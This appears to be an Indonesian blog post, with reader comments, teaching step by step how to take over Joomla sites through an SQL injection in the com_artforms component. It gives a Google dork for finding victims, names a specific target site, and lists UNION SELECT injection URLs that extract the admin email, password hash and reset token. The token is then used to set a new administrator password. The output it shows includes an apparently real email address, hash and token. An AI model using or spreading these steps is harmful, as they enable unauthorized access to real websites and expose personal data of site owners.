targetnya
cari di google
pake dork ini
inurl:"option com_artforms"
jangan malas mencari -_- di google :D
kita dapat target yaitu :
http://www.avaclean.com/
di exploid
ni kodenya di paste ke target tadi
/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,us
ntar jadi nya kyak gini
http://sitetarget.com//
disitu udah kelihatan emailnya
josh@bkmediagroup.comadminjosh@bkmediagroup.com:josh@bkmediagroup.com4fffa8274459e218833756e3149ab20d:jWt
nah open tab lagi ya kk mastah :)
terus
copy code reset pass ini
/index.php?option=com_user&view=reset
terus masukin kode reset paswordnya menjadi seperti ini :
http://www.avaclean.com//index.php?option=com_user&view=reset
setelah itu disuruh masukin email nantinya
masukin email yg kita dapat tadi
yaitu
josh@bkmediagroup.com
setelah di enter
anda disuruh masukin code :
kita tinggalin dulu yg ini
kita cari kode tsb di
web yg kita exploid tadi
open tab lagi neh untuk ngambil token nya :)
masukan code ini :
/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a
ntar jadi nya gini
http://sitetarget.com//
code nya :
admineda7d6142fac40a533b56407a4617371
nah kita kembali ke halaman reset tadi
kita masukin aja token yang ini
eda7d6142fac40a533b56407a4617371
truss enter :)) eehhh minta password baru dech dia :D
uppzzzzz kita masukin aja dech password kita :))
setelah udah masukin
kita masuk ke halaman admin nya
contoh :
http://sitetarget.com/administrator
nah masukin user nya :) & password kita :D
Buat Sobat Bloger yang ingin tukar link Bisa Kunjungi
kereeenn nemu exploit joomla lg :D
BalasHapuslanjutkan bang ojo nesu nesu ..wakakakakakak
udah gak jalan
BalasHapus